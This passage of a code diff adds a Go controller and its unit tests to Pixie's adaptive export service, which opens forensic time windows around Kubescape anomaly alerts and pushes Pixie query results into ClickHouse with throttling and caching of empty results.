+type Controller struct { + trig Trigger + sink Sink + clock Clock + cfg Config + querier PixieQuerier // nil disables operator-side pixie pushes + + mu sync.Mutex + active map[anomaly.AnomalyHash]*sink.AttributionRow + // inFlight tracks hashes whose pushPixieRows goroutine is currently + // running. handle() re-launches the goroutine when the previous one + // has exited (window expired between bursts), so a hash that already + // exists in `active` but is no longer being actively fanned-out + // gets refreshed protocol-table writes on the next alert. Without + // this, the goroutine only spawns on the very first event for a + // hash and subsequent bursts silently stop populating per-table + // rows even though attribution keeps updating in CH. + inFlight map[anomaly.AnomalyHash]bool + + // globalSem is the buffered channel that implements the + // MaxInflightQueriesGlobal throttle. nil → no global cap. + globalSem chan struct{} + + // emptyCacheMu guards emptyStreak and emptySkipUntil. Both are keyed + // by "ns|pod|table" — namespace must be part of the key, otherwise + // same-named pods in different namespaces share suppression state. + emptyCacheMu sync.Mutex + emptyStreak map[string]int // consecutive 0-row returns + emptySkipUntil map[string]time.Time // skip this (ns,pod,table) until this time +} + +// New wires a Controller. nil clock falls through to RealClock. +// nil querier disables the rev-1 push path (controller will only +// write attribution rows; expects cloud's retention plugin to write +// pixie tables). 
+func New(trig Trigger, snk Sink, cfg Config, clk Clock) *Controller { + if clk == nil { + clk = RealClock{} + } + defaulted := cfg.defaulted() + if defaulted.Rec == nil { + defaulted.Rec = reconcile.Nop{} + } + c := &Controller{ + trig: trig, + sink: snk, + clock: clk, + cfg: defaulted, + active: map[anomaly.AnomalyHash]*sink.AttributionRow{}, + inFlight: map[anomaly.AnomalyHash]bool{}, + emptyStreak: map[string]int{}, + emptySkipUntil: map[string]time.Time{}, + } + if defaulted.MaxInflightQueriesGlobal > 0 { + c.globalSem = make(chan struct{}, defaulted.MaxInflightQueriesGlobal) + } + return c +} + +// WithPixieQuerier wires the rev-1 path. Returns the receiver for +// chaining. Idempotent — call before Run. +func (c *Controller) WithPixieQuerier(q PixieQuerier) *Controller { + c.querier = q + return c +} + +// Rehydrate populates the in-memory active set from ClickHouse so a +// restarted operator picks up where it left off. Idempotent. Call +// once at boot before Run. +func (c *Controller) Rehydrate(ctx context.Context) error { + rows, err := c.sink.QueryActive(ctx, c.cfg.Hostname) + if err != nil { + return err + } + c.mu.Lock() + var resume []sink.AttributionRow + for i := range rows { + row := rows[i] + c.active[row.AnomalyHash] = &row + // Rev-1: a restart restored the window but no pushPixieRows goroutine — + // without this, post-restart Pixie data is silently missed until another + // event for the same hash arrives (CodeRabbit). Re-arm the fan-out for + // each restored window, mirroring handle()'s spawn (in-flight guarded). 
+ if c.querier != nil && len(c.cfg.PushPixieTables) > 0 && !c.inFlight[row.AnomalyHash] { + c.inFlight[row.AnomalyHash] = true + resume = append(resume, row) + } + } + c.mu.Unlock() + for i := range resume { + r := resume[i] + go func() { + defer func() { + c.mu.Lock() + delete(c.inFlight, r.AnomalyHash) + c.mu.Unlock() + }() + c.pushPixieRows(ctx, r) + }() + } + log.WithFields(log.Fields{"rehydrated": len(rows), "resumed": len(resume)}). + Info("controller: active set restored") + return nil +} + +// Run subscribes to the trigger and processes events until ctx is +// cancelled or the trigger closes its channel. Returns ctx.Err() on +// cancellation or nil on graceful trigger shutdown. +func (c *Controller) Run(ctx context.Context) error { + ch, err := c.trig.Subscribe(ctx) + if err != nil { + return err + } + for { + select { + case <-ctx.Done(): + return ctx.Err() + case ev, ok := <-ch: + if !ok { + return nil + } + c.handle(ctx, ev) + } + } +} + +// handle processes one event: open or extend the attribution row, +// then persist to ClickHouse. Errors from Sink.Write are logged but +// not fatal — system stability rule. +func (c *Controller) handle(ctx context.Context, ev kubescape.Event) { + hash := anomaly.Hash(ev.Target) + now := c.clock.Now() + tEvent := eventTimeToTime(ev.EventTime) + + c.mu.Lock() + row, exists := c.active[hash] + if !exists { + row = &sink.AttributionRow{ + AnomalyHash: hash, + Namespace: ev.Target.Namespace, + Pod: ev.Target.Pod, + Comm: ev.Target.Comm, + PID: ev.Target.PID, + Hostname: c.cfg.Hostname, + TStart: tEvent.Add(-c.cfg.Before), + TEnd: now.Add(c.cfg.After), + LastSeen: tEvent, + LastRuleID: ev.RuleID, + NAnomalies: 1, + } + c.active[hash] = row + } else { + // Extend t_end if the new now+after is later. Never shrink. + if proposed := now.Add(c.cfg.After); proposed.After(row.TEnd) { + row.TEnd = proposed + } + // Update last_seen if this event's timestamp is more recent. 
// pushPixieRows fans out per-table PxL queries and writes the results
// to forensic_db.{table} (the table name is handed to Sink.WritePixieRows).
// One goroutine per anomaly window. The first pass covers [t_start, now];
// subsequent passes (every PushRefreshInterval) cover only the new slice
// [last_upper, now] so pixie traffic that arrives AFTER the initial kubescape
// event still makes it into CH. Loop exits when the (possibly extended) t_end
// is in the past, the hash is no longer in c.active, ctx is cancelled, or —
// with a negative PushRefreshInterval — after the first pass. All failures
// are logged + non-fatal.
func (c *Controller) pushPixieRows(ctx context.Context, initial sink.AttributionRow) {
	target := anomaly.Target{
		PID:       initial.PID,
		Comm:      initial.Comm,
		Pod:       initial.Pod,
		Namespace: initial.Namespace,
	}
	log.WithFields(log.Fields{
		"hash":    initial.AnomalyHash,
		"pod":     initial.Pod,
		"comm":    initial.Comm,
		"tables":  len(c.cfg.PushPixieTables),
		"refresh": c.cfg.PushRefreshInterval,
		"t_start": initial.TStart,
		"t_end":   initial.TEnd,
	}).Info("pushPixieRows: starting fan-out")

	// Per-table watermark of pixie data we've already pulled for THIS
	// hash. We advance a table's cursor only after BOTH the query AND
	// the sink-write succeed; failures keep the cursor in place so the
	// next pass retries the same slice instead of dropping it.
	lastUpper := make(map[string]time.Time, len(c.cfg.PushPixieTables))
	for _, t := range c.cfg.PushPixieTables {
		lastUpper[t] = initial.TStart
	}
	pass := 0
	for {
		if ctx.Err() != nil {
			return
		}
		// Re-snapshot the active row each iteration so we pick up t_end
		// extensions from concurrent kubescape events (extending the
		// window beyond the initial t_end). COPY the row out of the
		// shared pointer before releasing the mutex — handle() mutates
		// the same struct, so reading TEnd after Unlock would race.
		c.mu.Lock()
		live, exists := c.active[initial.AnomalyHash]
		var current sink.AttributionRow
		if exists {
			current = *live
		}
		c.mu.Unlock()
		if !exists {
			log.WithField("hash", initial.AnomalyHash).
				Info("pushPixieRows: window closed (active entry gone)")
			return
		}
		// now is fixed once per pass: it is the upper bound of every table
		// slice in this pass and the timestamp of the reconcile rows.
		now := c.clock.Now()
		if !current.TEnd.After(now) {
			log.WithFields(log.Fields{
				"hash":  initial.AnomalyHash,
				"t_end": current.TEnd,
			}).Info("pushPixieRows: fan-out complete (window expired)")
			return
		}

		pass++
		// Fan out the per-table PxL queries IN PARALLEL. The serial
		// rev-1 loop spent 1.5-5s per refresh waiting for the 9 tables
		// that return 0 rows for this pod (a redis-server pod only ever
		// has data in redis_events; the other 9 queries are pure
		// latency tax). Parallel cuts the per-pass wall time to roughly
		// max(query_time) instead of sum(query_times). Each goroutine
		// runs an independent Pixie RPC; the cloud's PassThroughProxy
		// fans them across vizier-query-broker fine in our measurements
		// (10 simultaneous in-flight queries → ~250-700ms wall vs
		// ~3-5s serial).
		type tableResult struct {
			table    string
			sliceEnd time.Time
			rows     int
			err      error
		}
		// Buffered to the table count: each goroutine sends exactly one
		// result, so no send can block even though draining starts only
		// after wg.Wait().
		results := make(chan tableResult, len(c.cfg.PushPixieTables))
		var wg sync.WaitGroup
		// Per-hash concurrency limiter (knob #1: MaxParallelQueriesPerHash).
		// nil → unbounded (legacy behavior preserved).
		var perHashSem chan struct{}
		if c.cfg.MaxParallelQueriesPerHash > 0 {
			perHashSem = make(chan struct{}, c.cfg.MaxParallelQueriesPerHash)
		}
		for _, table := range c.cfg.PushPixieTables {
			if ctx.Err() != nil {
				break
			}
			// Knob #3: negative-cache skip. Pods that have returned 0
			// rows for this table N times in a row are skipped for TTL.
			// Self-heals when TTL expires. A skipped table keeps its
			// lastUpper, so the next query after the skip covers the
			// whole skipped range.
			if c.shouldSkipEmpty(initial.Namespace, initial.Pod, table) {
				continue
			}
			sliceStart := lastUpper[table]
			sliceEnd := now
			if !sliceEnd.After(sliceStart) {
				continue // tiny / inverted slice — skip
			}
			q, err := pxl.QueryFor(table, target, sliceStart, sliceEnd, now)
			if err != nil {
				log.WithError(err).WithField("table", table).Warn("controller: QueryFor")
				continue
			}
			wg.Add(1)
			go func(table, q string, sliceStart, sliceEnd time.Time) {
				defer wg.Done()
				// Per-pull reconciliation (ADAPTIVE_RECONCILE): record what
				// this goroutine READ from Pixie vs WROTE to CH for this
				// (pod, table, window), on EVERY return path. Deferred so a
				// sem-cancel / query error / sink error all still emit a row
				// — the reconcile run needs the failures, not just successes.
				var readCount, wroteCount int
				var recErr string
				defer func() {
					c.cfg.Rec.Record(ctx, reconcile.Row{
						TS:         now,
						Mode:       "filter",
						Table:      table,
						Namespace:  initial.Namespace,
						Pod:        initial.Pod,
						WinStart:   sliceStart,
						WinEnd:     sliceEnd,
						ReadCount:  int64(readCount),
						WroteCount: int64(wroteCount),
						WriteErr:   recErr,
						Hostname:   c.cfg.Hostname,
					})
				}()
				// Acquire per-hash slot, then optional global slot.
				// Order matters: per-hash is cheap and local; global
				// gates network. Releasing in reverse order avoids the
				// pathological case where a stuck global slot pins a
				// per-hash slot for an unrelated table. (The releases are
				// deferred, so they run last-acquired-first.)
				if perHashSem != nil {
					select {
					case perHashSem <- struct{}{}:
					case <-ctx.Done():
						recErr = ctx.Err().Error()
						results <- tableResult{table: table, err: ctx.Err()}
						return
					}
					defer func() { <-perHashSem }()
				}
				if c.globalSem != nil {
					select {
					case c.globalSem <- struct{}{}:
					case <-ctx.Done():
						recErr = ctx.Err().Error()
						results <- tableResult{table: table, err: ctx.Err()}
						return
					}
					defer func() { <-c.globalSem }()
				}
				// The query gets its own 180s deadline; cancel right after
				// the call to release the timer.
				qctx, cancel := context.WithTimeout(ctx, 180*time.Second)
				rows, qerr := c.querier.Query(qctx, q)
				cancel()
				if qerr != nil {
					recErr = qerr.Error()
					results <- tableResult{table: table, err: qerr}
					return
				}
				// Update negative cache: 0 rows bumps streak, ≥1 row resets.
				c.noteQueryResult(initial.Namespace, initial.Pod, table, len(rows))
				nrows := len(rows)
				readCount = nrows
				if nrows > 0 {
					// Bound the sink write with its own timeout. Without
					// this, a stalled CH HTTP write would hold the table
					// goroutine forever, wg.Wait() would block the entire
					// pass, and refreshes for the active window would stop
					// — symptoms documented in our session as "fan-out
					// started, no error, no push" rows in the operator log.
					wctx, wcancel := context.WithTimeout(ctx, 60*time.Second)
					werr := c.sink.WritePixieRows(wctx, table, rows)
					wcancel()
					if werr != nil {
						recErr = werr.Error()
						results <- tableResult{table: table, err: werr}
						return
					}
					wroteCount = nrows
					log.WithFields(log.Fields{
						"table": table,
						"rows":  nrows,
						"hash":  initial.AnomalyHash,
						"pass":  pass,
					}).Info("pushed pixie rows for active anomaly window")
				}
				// Success (including the 0-row case): report sliceEnd so the
				// caller can advance this table's watermark.
				results <- tableResult{table: table, sliceEnd: sliceEnd, rows: nrows}
			}(table, q, sliceStart, sliceEnd)
		}
		wg.Wait()
		close(results)
		for r := range results {
			if r.err != nil {
				// Query and sink failures share this one log line; the
				// wrapped error is the only hint as to which step failed.
				log.WithError(r.err).WithField("table", r.table).Warn("controller: pixie query or sink")
				continue // do NOT advance lastUpper — retry next pass
			}
			lastUpper[r.table] = r.sliceEnd
		}

		// Refresh interval treats negative as "single-shot" so callers
		// can opt out via the dedicated negative sentinel; the default
		// is 30s, set in defaulted(). Zero is reserved for "use default"
		// to keep the env-parsing layer simple (env unset → 0 → default).
		if c.cfg.PushRefreshInterval < 0 {
			log.WithField("hash", initial.AnomalyHash).
				Info("pushPixieRows: fan-out complete (single-shot mode)")
			return
		}
		if !sleepOrCancel(ctx, c.cfg.PushRefreshInterval) {
			return
		}
	}
}
+func (c *Controller) shouldSkipEmpty(namespace, pod, table string) bool { + if c.cfg.EmptyResultSkipAfterN <= 0 || c.cfg.EmptyResultSkipTTL <= 0 { + return false + } + key := namespace + "|" + pod + "|" + table + c.emptyCacheMu.Lock() + defer c.emptyCacheMu.Unlock() + until, ok := c.emptySkipUntil[key] + if !ok { + return false + } + if c.clock.Now().Before(until) { + return true + } + // TTL expired — clear it so the next call retries the query and + // can re-arm the cache from observed results. + delete(c.emptySkipUntil, key) + delete(c.emptyStreak, key) + return false +} + +// noteQueryResult updates the negative cache after a successful pixie +// query. 0 rows bumps the streak; ≥1 row resets it. Once the streak +// reaches the configured N, the (namespace, pod, table) triple is +// skipped for TTL. +func (c *Controller) noteQueryResult(namespace, pod, table string, nrows int) { + if c.cfg.EmptyResultSkipAfterN <= 0 || c.cfg.EmptyResultSkipTTL <= 0 { + return + } + c.emptyCacheMu.Lock() + defer c.emptyCacheMu.Unlock() + key := namespace + "|" + pod + "|" + table + if nrows > 0 { + delete(c.emptyStreak, key) + delete(c.emptySkipUntil, key) + return + } + c.emptyStreak[key]++ + if c.emptyStreak[key] >= c.cfg.EmptyResultSkipAfterN { + c.emptySkipUntil[key] = c.clock.Now().Add(c.cfg.EmptyResultSkipTTL) + } +} + +// sleepOrCancel returns true on normal sleep completion, false if ctx cancelled. +func sleepOrCancel(ctx context.Context, d time.Duration) bool { + t := time.NewTimer(d) + defer t.Stop() + select { + case <-ctx.Done(): + return false + case <-t.C: + return true + } +} + +// Active returns the count of in-memory active hashes (test helper). +func (c *Controller) Active() int { + c.mu.Lock() + defer c.mu.Unlock() + return len(c.active) +} + +// SnapshotActive returns a fresh QueryActive against CH. Exposed so +// callers (e.g. main.go) can seed the streaming ActiveSet at boot +// without having to know about Sink internals. 
+func (c *Controller) SnapshotActive(ctx context.Context) ([]sink.AttributionRow, error) { + return c.sink.QueryActive(ctx, c.cfg.Hostname) +} + +// eventTimeToTime converts forensic_db.kubescape_logs.event_time (UInt64) +// into a time.Time, auto-detecting the unit. Vector's kubescape sink in +// the soc lab writes unix SECONDS (~1.7e9), but other deployments may +// emit millis (~1.7e12) or nanos (~1.7e18) per kubescape's own field +// conventions. Magnitude check picks the unit so we don't silently +// misinterpret the same UInt64 across pipeline variants. +func eventTimeToTime(et uint64) time.Time { + switch { + case et < 1e10: + return time.Unix(int64(et), 0).UTC() // seconds + case et < 1e13: + return time.Unix(0, int64(et)*int64(time.Millisecond)).UTC() // millis + default: + return time.Unix(0, int64(et)).UTC() // nanos + } +} + +// PruneExpired removes from the in-memory active set every entry whose +// t_end has been in the past longer than a grace period. ClickHouse's +// ReplacingMergeTree handles table-side cleanup; this just keeps the +// operator's RAM bounded. +// +// The grace period (2 * cfg.After by default) bridges the gap between +// the prune timer and the next detection cycle: without it, a +// same-hash alert arriving milliseconds after a prune ran would spawn +// a fresh pushPixieRows goroutine, re-scanning the slice from +// initial.TStart and wasting Pixie query budget on data we already +// scanned. Empirically (2026-05-15) the un-graced prune accounted for +// 100% of pushPixieRows goroutine exits, none reached the natural +// "window expired" path — the prune kept racing reactivation. +// +// Caller invokes on a periodic timer. +func (c *Controller) PruneExpired() int { + now := c.clock.Now() + grace := 2 * c.cfg.After + // Collect under the lock; fire callbacks AFTER releasing so we + // don't hold the controller mutex across user code. 
+ // + // IMPORTANT (rev-3 streaming correctness): c.active is keyed by + // anomaly hash, but the streaming layer (ActiveSet) is keyed by + // (namespace, pod). One pod can host multiple distinct hashes + // (e.g. pgsql-server has hashes for postgres, pg_isready, runc: + // [2:INIT] processes). Firing OnPrune for every evicted hash + // would prematurely stop streaming for a pod that still has + // other active hashes. So: compute the set of pods that have + // NO remaining active hashes after this prune, and only fire + // OnPrune for those. + type podKey struct{ namespace, pod string } + prunedHashes := 0 + var pruned []podKey + c.mu.Lock() + // Pass 1: delete expired hashes and remember which pods THEY + // belonged to. + candidatePods := map[podKey]struct{}{} + for h, row := range c.active { + if !row.TEnd.Add(grace).After(now) { + candidatePods[podKey{row.Namespace, row.Pod}] = struct{}{} + delete(c.active, h) + prunedHashes++ + } + } + // Pass 2: from candidatePods, remove any pod that STILL has at + // least one surviving hash in c.active. What's left is the set + // of pods that lost their LAST hash — these get OnPrune. + for _, row := range c.active { + delete(candidatePods, podKey{row.Namespace, row.Pod}) + } + for pk := range candidatePods { + pruned = append(pruned, pk) + } + c.mu.Unlock() + if c.cfg.OnPrune != nil { + for _, k := range pruned { + c.cfg.OnPrune(k.namespace, k.pod) + } + } + return prunedHashes +} diff --git a/src/vizier/services/adaptive_export/internal/controller/controller_test.go b/src/vizier/services/adaptive_export/internal/controller/controller_test.go new file mode 100644 index 00000000000..03b5471c070 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/controller/controller_test.go @@ -0,0 +1,681 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package controller + +import ( + "context" + "errors" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// ---------- fakes ---------- + +type fakeTrigger struct { + ch chan kubescape.Event + err error +} + +func newFakeTrigger() *fakeTrigger { return &fakeTrigger{ch: make(chan kubescape.Event, 16)} } + +func (f *fakeTrigger) Subscribe(_ context.Context) (<-chan kubescape.Event, error) { + if f.err != nil { + return nil, f.err + } + return f.ch, nil +} + +func (f *fakeTrigger) push(ev kubescape.Event) { f.ch <- ev } +func (f *fakeTrigger) close() { close(f.ch) } + +type fakeSink struct { + mu sync.Mutex + writes []sink.AttributionRow + preload []sink.AttributionRow + werr error + qerr error +} + +func (f *fakeSink) WritePixieRows(_ context.Context, _ string, _ []map[string]any) error { + return nil +} + +func (f *fakeSink) Write(_ context.Context, rows []sink.AttributionRow) error { + f.mu.Lock() + defer f.mu.Unlock() + if f.werr != nil { + return f.werr + } + f.writes = append(f.writes, rows...) 
+ return nil +} + +func (f *fakeSink) QueryActive(_ context.Context, hostname string) ([]sink.AttributionRow, error) { + f.mu.Lock() + defer f.mu.Unlock() + if f.qerr != nil { + return nil, f.qerr + } + out := make([]sink.AttributionRow, 0, len(f.preload)) + for _, r := range f.preload { + if r.Hostname == hostname { + out = append(out, r) + } + } + return out, nil +} + +func (f *fakeSink) snapshot() []sink.AttributionRow { + f.mu.Lock() + defer f.mu.Unlock() + return append([]sink.AttributionRow{}, f.writes...) +} + +type fakeClock struct { + mu sync.Mutex + t time.Time +} + +func (c *fakeClock) Now() time.Time { c.mu.Lock(); defer c.mu.Unlock(); return c.t } +func (c *fakeClock) advance(d time.Duration) { + c.mu.Lock() + defer c.mu.Unlock() + c.t = c.t.Add(d) +} + +// ---------- helpers ---------- + +var canonicalEventTime = time.Unix(0, 1744477360303026359).UTC() + +func canonicalEvent() kubescape.Event { + return kubescape.Event{ + Target: anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + }, + EventTime: 1744477360303026359, + RuleID: "R1005", + Hostname: "node-1", + } +} + +func anotherTargetEvent() kubescape.Event { + ev := canonicalEvent() + ev.Target.PID = 999999 + ev.RuleID = "R0006" + return ev +} + +func waitFor(t *testing.T, what string, deadline time.Duration, ok func() bool) { + t.Helper() + stop := time.Now().Add(deadline) + for time.Now().Before(stop) { + if ok() { + return + } + time.Sleep(2 * time.Millisecond) + } + t.Fatalf("timeout waiting for %s", what) +} + +func runController(t *testing.T, c *Controller, trig *fakeTrigger) func() { + t.Helper() + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = c.Run(ctx); close(done) }() + return func() { + trig.close() + cancel() + select { + case <-done: + case <-time.After(1 * time.Second): + t.Fatalf("controller did not stop within 1s") + } + } +} + +func defaultCfg() Config { + return 
Config{Hostname: "node-1", Before: 5 * time.Minute, After: 5 * time.Minute} +} + +// ---------- tests ---------- + +// TestController_NewWindow_FirstAnomalyOnTarget — first event on a hash +// produces one Sink write with t_start = event - Before, t_end = now + After. +func TestController_NewWindow_FirstAnomalyOnTarget(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime.Add(time.Second)} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) > 0 }) + got := snk.snapshot()[0] + wantHash := anomaly.Hash(canonicalEvent().Target) + if got.AnomalyHash != wantHash { + t.Fatalf("hash = %q, want %q", got.AnomalyHash, wantHash) + } + if got.PID != 106040 || got.Comm != "redis-server" || got.Namespace != "redis" { + t.Fatalf("identity wrong: %+v", got) + } + if got.Hostname != "node-1" { + t.Fatalf("Hostname = %q", got.Hostname) + } + wantStart := canonicalEventTime.Add(-5 * time.Minute) + if !got.TStart.Equal(wantStart) { + t.Fatalf("TStart = %v, want %v", got.TStart, wantStart) + } + wantEnd := clk.Now().Add(5 * time.Minute) + if !got.TEnd.Equal(wantEnd) { + t.Fatalf("TEnd = %v, want %v", got.TEnd, wantEnd) + } + if got.NAnomalies != 1 || got.LastRuleID != "R1005" { + t.Fatalf("LastRuleID/NAnomalies wrong: %+v", got) + } +} + +// TestController_Coalesce_SecondAnomalySameHash — second event on the +// same target reuses the same row, increments n_anomalies, extends t_end. 
+func TestController_Coalesce_SecondAnomalySameHash(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime.Add(time.Second)} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 }) + + clk.advance(2 * time.Minute) // 2 minutes pass; t_end should reset to now+5min + ev2 := canonicalEvent() + ev2.RuleID = "R0006" + ev2.EventTime = uint64(canonicalEventTime.Add(2 * time.Minute).UnixNano()) + trig.push(ev2) + waitFor(t, "second write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 }) + + if c.Active() != 1 { + t.Fatalf("Active = %d, want 1 (must coalesce on same hash)", c.Active()) + } + got := snk.snapshot()[1] + if got.NAnomalies != 2 { + t.Fatalf("NAnomalies = %d, want 2", got.NAnomalies) + } + if got.LastRuleID != "R0006" { + t.Fatalf("LastRuleID = %q, want R0006", got.LastRuleID) + } + wantEnd := clk.Now().Add(5 * time.Minute) + if !got.TEnd.Equal(wantEnd) { + t.Fatalf("TEnd = %v, want %v (must extend on coalesce)", got.TEnd, wantEnd) + } +} + +// TestController_NeverShrinksTEnd — out-of-order arrivals or repeats +// must not regress t_end backward. 
+func TestController_NeverShrinksTEnd(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "first", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 }) + originalEnd := snk.snapshot()[0].TEnd + + // fake clock REWINDS — pathological but defensive + clk.advance(-time.Hour) + trig.push(canonicalEvent()) + waitFor(t, "second", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 }) + got := snk.snapshot()[1] + if !got.TEnd.Equal(originalEnd) { + t.Fatalf("TEnd regressed: was %v, now %v", originalEnd, got.TEnd) + } +} + +// TestController_NewWindowForColdTarget — different target opens a 2nd +// active row, preserving the first. +func TestController_NewWindowForColdTarget(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + trig.push(anotherTargetEvent()) + waitFor(t, "two active", 300*time.Millisecond, func() bool { return c.Active() == 2 }) +} + +// TestController_Rehydrate_FromSink — boot reads still-active rows. 
+func TestController_Rehydrate_FromSink(t *testing.T) { + trig := newFakeTrigger() + t0 := canonicalEventTime + preload := []sink.AttributionRow{ + {AnomalyHash: "h1", Hostname: "node-1", PID: 1, Comm: "x", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 5}, + {AnomalyHash: "h2", Hostname: "node-OTHER", PID: 2, Comm: "y", TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 1}, + } + snk := &fakeSink{preload: preload} + clk := &fakeClock{t: t0} + c := New(trig, snk, defaultCfg(), clk) + + if err := c.Rehydrate(context.Background()); err != nil { + t.Fatalf("Rehydrate: %v", err) + } + if c.Active() != 1 { + t.Fatalf("Active after rehydrate = %d, want 1 (must filter by hostname)", c.Active()) + } +} + +// TestController_PruneExpired — entries past their t_end drop out. +func TestController_PruneExpired(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, Config{Hostname: "node-1", Before: time.Minute, After: time.Minute}, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + + // PruneExpired() now waits for TEnd + 2*After (the grace period that + // prevents racing same-hash alerts arriving right after a prune from + // spawning fresh pushPixieRows goroutines that re-scan the slice). + // With Before=After=1m the row's TEnd is now+1m, so we need to advance + // past now+1m+2*1m = now+3m. + clk.advance(3*time.Minute + time.Second) // past t_end + 2*After grace + if r := c.PruneExpired(); r != 1 { + t.Fatalf("PruneExpired removed %d, want 1", r) + } + if c.Active() != 0 { + t.Fatalf("Active after prune = %d, want 0", c.Active()) + } +} + +// TestController_SinkErrorNonFatal — controller does not crash on Sink.Write error. 
+func TestController_SinkErrorNonFatal(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{werr: errors.New("ch unreachable")} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + // Wait for the handler to process the event (no fixed sleep). + waitFor(t, "active=1 despite sink error", 200*time.Millisecond, func() bool { return c.Active() == 1 }) +} + +// TestController_RestartMidStream_Aborts — context cancel terminates Run. +func TestController_RestartMidStream_Aborts(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + c := New(trig, snk, defaultCfg(), clk) + + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = c.Run(ctx); close(done) }() + + trig.push(canonicalEvent()) + waitFor(t, "controller picked up event", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + cancel() + select { + case <-done: + case <-time.After(300 * time.Millisecond): + t.Fatalf("controller did not abort within 300ms of cancel") + } +} + +// ──────────────────────────────────────────────────────────────── +// Callbacks (rev-3 streaming hook): OnAttribution + OnPrune +// ──────────────────────────────────────────────────────────────── + +type attrCall struct { + ns, pod string + tEnd time.Time +} + +// TestController_OnAttribution_FiresPerEvent — every kubescape +// event (new or extension) triggers exactly one OnAttribution. 
+func TestController_OnAttribution_FiresPerEvent(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + + var mu sync.Mutex + var calls []attrCall + cfg := defaultCfg() + cfg.OnAttribution = func(ns, pod string, tEnd time.Time) { + mu.Lock() + defer mu.Unlock() + calls = append(calls, attrCall{ns, pod, tEnd}) + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + trig.push(canonicalEvent()) // extension on same hash + trig.push(canonicalEvent()) + waitFor(t, "3 attribution callbacks", 300*time.Millisecond, func() bool { + mu.Lock() + defer mu.Unlock() + return len(calls) == 3 + }) + mu.Lock() + defer mu.Unlock() + for _, c := range calls { + if c.pod == "" { + t.Fatalf("callback received empty pod: %+v", c) + } + if c.tEnd.IsZero() { + t.Fatalf("callback received zero tEnd: %+v", c) + } + } +} + +// TestController_OnAttribution_NilIsNoop — nil callback must not crash. +func TestController_OnAttribution_NilIsNoop(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + cfg := defaultCfg() + cfg.OnAttribution = nil // explicit + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + trig.push(canonicalEvent()) + waitFor(t, "event landed", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + // No assertion needed beyond not panicking. +} + +// TestController_OnPrune_FiresWithKeyDetails — PruneExpired must +// emit one OnPrune callback per evicted hash, with ns + pod set. 
